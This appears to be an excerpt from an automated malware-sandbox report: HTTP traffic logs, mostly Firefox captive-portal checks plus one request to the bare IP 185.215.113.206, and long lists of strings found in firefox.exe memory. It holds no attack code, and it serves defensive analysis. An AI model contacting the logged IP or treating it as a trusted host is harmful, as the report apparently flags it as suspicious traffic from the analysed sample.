Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171944000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171944000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE b.guid IN (https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/UpdateService:selectUpdate - the user requires elevation to install this update, but the user has exceeded the max number of elevation attempts.AND (bookmarked OR frecency > 20) equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?disabled=https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=$locale&region=$region&count=30https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService:_selectAndInstallUpdate - update not supported for this system. Notifying observers. topic: update-available, status: unsupportedUPDATE moz_bookmarks SET position = position - 1 equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?disabled=https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=$locale&region=$region&count=30https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService:_selectAndInstallUpdate - update not supported for this system. Notifying observers. topic: update-available, status: unsupportedUPDATE moz_bookmarks SET position = position - 1 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'Should setting it as the default PDF handler only replace existing PDF handlers that are browsers, and not other PDF handlers such as Acrobat Reader or Nitro PDF.Allow the background update process to download and apply updates when the Mozilla Maintenance Service is unavailable but the installation directory can be written.moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/requestStorageAccess_helper.js[{incognito:null, tabId:null, types:["image"], urls:["https://smartblock.firefox.etp/facebook.svg", "https://smartblock.firefox.etp/play.svg"], windowId:null}, ["blocking"]]handleFallbackToCompleteUpdate - install of complete or only one patch offered failed. Notifying observers. topic: update-error, status: unknown, update.patchCount: DELETE FROM moz_places WHERE id IN ( equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/data/ua_overrides.jsUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/data/ua_overrides.jsUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/data/ua_overrides.jsUpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://track.adform.net/serving/scripts/trackpoint/*://static.chartbeat.com/js/chartbeat.jsresource://gre/modules/FileUtils.sys.mjsFileUtils_openAtomicFileOutputStreamFileUtils_openSafeFileOutputStreampictureinpicture%40mozilla.org:1.0.0https://smartblock.firefox.etp/facebook.svg*://pub.doubleverify.com/signals/pub.js**://c.amazon-adsystem.com/aax2/apstag.jswebcompat-reporter@mozilla.org.xpi*://auth.9c9media.ca/auth/main.jsresource://gre/modules/addons/XPIProvider.jsm*://www.rva311.com/static/js/main.*.chunk.js*://www.google-analytics.com/analytics.js**://www.google-analytics.com/plugins/ua/ec.js*://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://www.googletagmanager.com/gtm.js**://www.googletagservices.com/tag/js/gpt.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://static.adsafeprotected.com/iasPET.1.js*://adservex.media.net/videoAds.js**://*.moatads.com/*/moatheader.js**://www.google-analytics.com/gtm/js**://cdn.adsafeprotected.com/iasPET.1.js*://*.vidible.tv/*/vidible-min.js**://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s.webtrends.com/js/advancedLinkTracking.js*://s.webtrends.com/js/webtrends.min.js*://cdn.optimizely.com/public/*.js*://s.webtrends.com/js/webtrends.jsresource://gre/modules/AsyncShutdown.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://vast.adsafeprotected.com/vast**://www.facebook.com/platform/impression.php*extensions.geckoProfiler.acceptedExtensionIds equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2780914101.000001C174EE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2780914101.000001C174E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0))) equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0))) equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0))) equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
